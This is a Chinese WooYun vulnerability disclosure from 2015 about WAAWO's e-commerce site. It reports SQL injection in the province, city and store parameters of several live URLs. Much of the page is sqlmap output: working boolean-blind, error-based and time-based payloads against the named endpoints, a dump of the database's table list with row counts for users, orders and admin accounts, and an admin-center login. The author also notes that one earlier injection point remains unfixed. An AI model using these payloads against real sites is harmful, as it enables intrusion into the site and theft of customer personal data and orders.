当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142219

漏洞标题:哇喔科技(WAAWO)另外多处SQL注入泄露所有用户数据+客户订单(可远程操控上千设备)+进入管理中心

相关厂商:哇喔科技

漏洞作者: 路人甲

提交时间:2015-09-20 10:03

修复时间:2015-11-04 10:04

公开时间:2015-11-04 10:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

打包几个注入点!~~~SQL注入,可泄漏所用用户数据以及客户订单,手机安装APP后可控制上千设备!~~~

详细说明:

因为有些注入点已经被提交过了,那么就不提交了,看看其他的注入点:
注入点1:

http://www.waawo.cn/shops/network.php?province=16&city=226


province和city均存在注入

0.jpg


1.jpg


2.jpg


3.jpg


4.jpg


database management system users [1]:
[*] 'waawo'@'localhost'
available databases [2]:
[*] information_schema
[*] waawo
Database: waawo
[101 tables]
+--------------------------------+
| ecs_account_log                |
| ecs_ad                         |
| ecs_ad_custom                  |
| ecs_ad_position                |
| ecs_admin_action               |
| ecs_admin_log                  |
| ecs_admin_message              |
| ecs_admin_user                 |
| ecs_adsense                    |
| ecs_affiliate_log              |
| ecs_agency                     |
| ecs_area_region                |
| ecs_article                    |
| ecs_article_cat                |
| ecs_attribute                  |
| ecs_auction_log                |
| ecs_auto_manage                |
| ecs_back_goods                 |
| ecs_back_order                 |
| ecs_bonus_type                 |
| ecs_booking_goods              |
| ecs_brand                      |
| ecs_card                       |
| ecs_cart                       |
| ecs_cat_recommend              |
| ecs_category                   |
| ecs_collect_goods              |
| ecs_comment                    |
| ecs_crons                      |
| ecs_delivery_goods             |
| ecs_delivery_order             |
| ecs_email_list                 |
| ecs_email_sendlist             |
| ecs_error_log                  |
| ecs_exchange_goods             |
| ecs_favourable_activity        |
| ecs_feedback                   |
| ecs_friend_link                |
| ecs_goods                      |
| ecs_goods_activity             |
| ecs_goods_article              |
| ecs_goods_attr                 |
| ecs_goods_cat                  |
| ecs_goods_gallery              |
| ecs_goods_type                 |
| ecs_group_goods                |
| ecs_keywords                   |
| ecs_link_goods                 |
| ecs_mail_templates             |
| ecs_member_price               |
| ecs_nav                        |
| ecs_network                    |
| ecs_order_action               |
| ecs_order_goods                |
| ecs_order_info                 |
| ecs_pack                       |
| ecs_package_goods              |
| ecs_pay_log                    |
| ecs_payment                    |
| ecs_plugins                    |
| ecs_products                   |
| ecs_purchase_offline           |
| ecs_purchase_online            |
| ecs_purchase_store             |
| ecs_purchase_store_branch      |
| ecs_purchase_website           |
| ecs_reg_extend_info            |
| ecs_reg_fields                 |
| ecs_region                     |
| ecs_role                       |
| ecs_searchengine               |
| ecs_sessions                   |
| ecs_sessions_data              |
| ecs_shipping                   |
| ecs_shipping_area              |
| ecs_shop_config                |
| ecs_snatch_log                 |
| ecs_stats                      |
| ecs_suppliers                  |
| ecs_tag                        |
| ecs_template                   |
| ecs_topic                      |
| ecs_user_account               |
| ecs_user_address               |
| ecs_user_bonus                 |
| ecs_user_feed                  |
| ecs_user_rank                  |
| ecs_users                      |
| ecs_verify_code                |
| ecs_view_network               |
| ecs_view_purchase_offline      |
| ecs_view_purchase_store_branch |
| ecs_virtual_card               |
| ecs_volume_price               |
| ecs_vote                       |
| ecs_vote_log                   |
| ecs_vote_option                |
| ecs_wholesale                  |
| ecs_yhj                        |
| ecs_youhuijuan                 |
| ecs_yushou                     |
+--------------------------------+
Database: waawo
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| ecs_stats                      | 170661  |
| ecs_youhuijuan                 | 46439   |		4万优惠券
| ecs_verify_code                | 8537    |
| ecs_users                      | 4062    |		4千用户
| ecs_keywords                   | 3929    |
| ecs_region                     | 3408    |
| ecs_pay_log                    | 1226    |		一千多付费记录
| ecs_admin_log                  | 1113    |		一千多管理员登录记录
| ecs_order_action               | 793     |
| ecs_sessions                   | 695     |
| ecs_order_goods                | 611     |
| ecs_order_info                 | 583     |
| ecs_sessions_data              | 567     |
| ecs_searchengine               | 486     |
| ecs_user_address               | 386     |		用户地址
| ecs_account_log                | 296     |
| ecs_delivery_goods             | 253     |
| ecs_delivery_order             | 231     |		快递信息
| ecs_shop_config                | 214     |
| ecs_admin_action               | 115     |
| ecs_purchase_store_branch      | 86      |
| ecs_view_purchase_store_branch | 86      |
| ecs_purchase_online            | 72      |
| ecs_article                    | 46      |
| ecs_area_region                | 39      |
| ecs_yushou                     | 34      |
| ecs_template                   | 22      |
| ecs_nav                        | 18      |
| ecs_yhj                        | 16      |
| ecs_article_cat                | 14      |
| ecs_cat_recommend              | 14      |
| ecs_mail_templates             | 14      |
| ecs_brand                      | 12      |
| ecs_user_bonus                 | 10      |
| ecs_purchase_offline           | 9       |
| ecs_view_purchase_offline      | 9       |
| ecs_back_order                 | 8       |
| ecs_goods_activity             | 8       |
| ecs_shipping                   | 7       |
| ecs_back_goods                 | 6       |
| ecs_goods                      | 6       |
| ecs_goods_attr                 | 6       |
| ecs_goods_gallery              | 6       |
| ecs_package_goods              | 6       |
| ecs_reg_fields                 | 6       |
| ecs_shipping_area              | 6       |
| ecs_admin_user                 | 5       |		管理员
| ecs_payment                    | 5       |
| ecs_volume_price               | 5       |
| ecs_bonus_type                 | 4       |
| ecs_category                   | 3       |
| ecs_friend_link                | 3       |
| ecs_member_price               | 3       |
| ecs_user_rank                  | 3       |
| ecs_vote_option                | 3       |
| ecs_booking_goods              | 2       |
| ecs_exchange_goods             | 2       |
| ecs_link_goods                 | 2       |
| ecs_purchase_store             | 2       |
| ecs_purchase_website           | 2       |
| ecs_snatch_log                 | 2       |
| ecs_suppliers                  | 2       |
| ecs_ad_position                | 1       |
| ecs_attribute                  | 1       |
| ecs_auction_log                | 1       |
| ecs_card                       | 1       |
| ecs_cart                       | 1       |
| ecs_email_sendlist             | 1       |
| ecs_favourable_activity        | 1       |
| ecs_goods_type                 | 1       |
| ecs_network                    | 1       |
| ecs_pack                       | 1       |
| ecs_role                       | 1       |
| ecs_topic                      | 1       |
| ecs_user_account               | 1       |
| ecs_view_network               | 1       |
| ecs_vote                       | 1       |
| ecs_wholesale                  | 1       |
+--------------------------------+---------+


5.jpg


6.jpg


7.jpg


8.jpg


9.jpg


泄漏用户数据,客户订单
当然,如果要是下载了APP,那么就可以通过登录,远程控制上千设备了!~~~就不下载APP测试了!~~~
注入点2:

http://www.waawo.cn/shops/purchase_area_offline.php?province=2&city=52&p=1


同样是province和city存在注入

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: city
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: province=2&city=52 AND 5053=5053&p=1
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: province=2&city=52 AND (SELECT 3272 FROM(SELECT COUNT(*),CONCAT(0x7
1686e6671,(SELECT (CASE WHEN (3272=3272) THEN 1 ELSE 0 END)),0x7178736971,FLOOR(
RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&p=1
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: province=2&city=52 AND SLEEP(5)&p=1
Place: GET
Parameter: province
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: province=2 AND 5749=5749&city=52&p=1
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: province=2 AND (SELECT 6013 FROM(SELECT COUNT(*),CONCAT(0x71686e667
1,(SELECT (CASE WHEN (6013=6013) THEN 1 ELSE 0 END)),0x7178736971,FLOOR(RAND(0)*
2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&city=52&p=1
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: province=2 AND SLEEP(5)&city=52&p=1
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: GET, parameter: city, type: Unescaped numeric (default)
[1] place: GET, parameter: province, type: Unescaped numeric
[q] Quit
> 0
[13:32:31] [INFO] testing MySQL
[13:32:31] [WARNING] reflective value(s) found and filtering out
[13:32:31] [INFO] confirming MySQL
[13:32:31] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
[13:32:31] [INFO] fetching current user
[13:32:31] [INFO] resumed: waawo@localhost
current user:    'waawo@localhost'
[13:32:31] [INFO] fetching current database
[13:32:31] [INFO] resumed: waawo
current database:    'waawo'
[13:32:31] [INFO] testing if current user is DBA
[13:32:31] [INFO] fetching current user
current user is DBA:    False


注入点3:

http://www.waawo.cn/shops/purchase_area_branch.php?province=16&city=220&store=1&p=1


同样是province、city存在注入,同时store也存在注入

[13:27:42] [INFO] testing connection to the target URL
[13:27:43] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[13:27:44] [INFO] target URL is stable
[13:27:44] [INFO] testing if GET parameter 'province' is dynamic
[13:27:44] [INFO] confirming that GET parameter 'province' is dynamic
[13:27:45] [INFO] GET parameter 'province' is dynamic
[13:27:45] [INFO] heuristic (basic) test shows that GET parameter 'province' mig
ht be injectable (possible DBMS: 'MySQL')
[13:27:45] [INFO] testing for SQL injection on GET parameter 'province'
[13:27:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:27:45] [WARNING] reflective value(s) found and filtering out
[13:27:46] [INFO] GET parameter 'province' seems to be 'AND boolean-based blind
- WHERE or HAVING clause' injectable
[13:27:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[13:27:46] [INFO] GET parameter 'province' is 'MySQL >= 5.0 AND error-based - WH
ERE or HAVING clause' injectable
[13:27:46] [INFO] testing 'MySQL inline queries'
[13:27:46] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[13:27:46] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[13:27:47] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[13:28:47] [INFO] GET parameter 'province' seems to be 'MySQL > 5.0.11 AND time-
based blind' injectable
[13:28:47] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[13:28:47] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[13:28:52] [INFO] target URL appears to be UNION injectable with 1 columns
[13:28:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'province' is vulnerable. Do you want to keep testing the others (
if any)? [y/N] y
[13:29:00] [INFO] testing if GET parameter 'city' is dynamic
[13:29:00] [INFO] confirming that GET parameter 'city' is dynamic
[13:29:00] [INFO] GET parameter 'city' is dynamic
[13:29:00] [INFO] heuristic (basic) test shows that GET parameter 'city' might b
e injectable (possible DBMS: 'MySQL')
[13:29:00] [INFO] testing for SQL injection on GET parameter 'city'
[13:29:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:29:01] [INFO] GET parameter 'city' seems to be 'AND boolean-based blind - WH
ERE or HAVING clause' injectable
[13:29:01] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[13:29:01] [INFO] GET parameter 'city' is 'MySQL >= 5.0 AND error-based - WHERE
or HAVING clause' injectable
[13:29:01] [INFO] testing 'MySQL inline queries'
[13:29:02] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[13:29:03] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[13:30:03] [INFO] GET parameter 'city' seems to be 'MySQL > 5.0.11 AND time-base
d blind' injectable
[13:30:03] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[13:30:03] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[13:30:04] [INFO] target URL appears to have 1 column in query
[13:30:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'city' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] y
[13:30:18] [INFO] testing if GET parameter 'store' is dynamic
[13:30:18] [INFO] confirming that GET parameter 'store' is dynamic
[13:30:19] [INFO] GET parameter 'store' is dynamic
[13:30:19] [INFO] heuristic (basic) test shows that GET parameter 'store' might
be injectable (possible DBMS: 'MySQL')
[13:30:19] [INFO] testing for SQL injection on GET parameter 'store'
[13:30:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:30:20] [INFO] GET parameter 'store' seems to be 'AND boolean-based blind - W
HERE or HAVING clause' injectable
[13:30:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[13:30:21] [INFO] GET parameter 'store' is 'MySQL >= 5.0 AND error-based - WHERE
 or HAVING clause' injectable
[13:30:21] [INFO] testing 'MySQL inline queries'
[13:30:21] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[13:30:21] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[13:31:21] [INFO] GET parameter 'store' seems to be 'MySQL > 5.0.11 AND time-bas
ed blind' injectable
[13:31:21] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[13:31:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'store' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] n
sqlmap identified the following injection points with a total of 104 HTTP(s) req
uests:
---
Place: GET
Parameter: city
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: province=16&city=220 AND 9286=9286&store=1&p=1
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: province=16&city=220 AND (SELECT 9021 FROM(SELECT COUNT(*),CONCAT(0
x716d6a6771,(SELECT (CASE WHEN (9021=9021) THEN 1 ELSE 0 END)),0x71756d6271,FLOO
R(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&store=1&p=1
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: province=16&city=220 AND SLEEP(5)&store=1&p=1
Place: GET
Parameter: province
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: province=16 AND 7811=7811&city=220&store=1&p=1
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: province=16 AND (SELECT 1698 FROM(SELECT COUNT(*),CONCAT(0x716d6a67
71,(SELECT (CASE WHEN (1698=1698) THEN 1 ELSE 0 END)),0x71756d6271,FLOOR(RAND(0)
*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&city=220&store=1&p=1
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: province=16 AND SLEEP(5)&city=220&store=1&p=1
Place: GET
Parameter: store
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: province=16&city=220&store=1 AND 4161=4161&p=1
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: province=16&city=220&store=1 AND (SELECT 5301 FROM(SELECT COUNT(*),
CONCAT(0x716d6a6771,(SELECT (CASE WHEN (5301=5301) THEN 1 ELSE 0 END)),0x71756d6
271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&p=1
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: province=16&city=220&store=1 AND SLEEP(5)&p=1
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: GET, parameter: province, type: Unescaped numeric (default)
[1] place: GET, parameter: city, type: Unescaped numeric
[2] place: GET, parameter: store, type: Unescaped numeric
[q] Quit
> 0
[13:31:31] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
[13:31:31] [INFO] fetching current user
[13:31:32] [INFO] retrieved: waawo@localhost
current user:    'waawo@localhost'
[13:31:32] [INFO] fetching current database
[13:31:33] [INFO] retrieved: waawo
current database:    'waawo'
[13:31:33] [INFO] testing if current user is DBA
[13:31:33] [INFO] fetching current user
current user is DBA:    False


4、存在robots文件

http://www.waawo.cn/shops/robots.txt
User-agent: *
Disallow: /admin/
Disallow: /cert/
Disallow: /data/
Disallow: /includes/
Disallow: /install/
Disallow: /languages/
Disallow: /plugins/
Disallow: /templates/
Disallow: /themes/
Disallow: /upgrade/
Disallow: /api/
Disallow: /js/
Disallow: /affiche.php
Disallow: /captcha.php
Disallow: /comment.php
Disallow: /cycle_image.php
Disallow: /goods_script.php
Disallow: /receive.php
Disallow: /region.php
Disallow: /respond.php
Disallow: /feed.php
Disallow: /gallery.php


5、进入waawo管理中心

http://www.waawo.cn/shops/admin/privilege.php?act=login


后台.jpg


似乎权限还不够大!~~~看来要超级管理员才行
WooYun: 哇喔科技(WAAWO)某处漏洞泄露所有用户数据+客户订单(可远程操控上千设备) 

http://www.waawo.cn/media-news.php?id=37


这个注入点还没有修复!~~~

漏洞证明:

如上

修复方案:

过滤修复

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)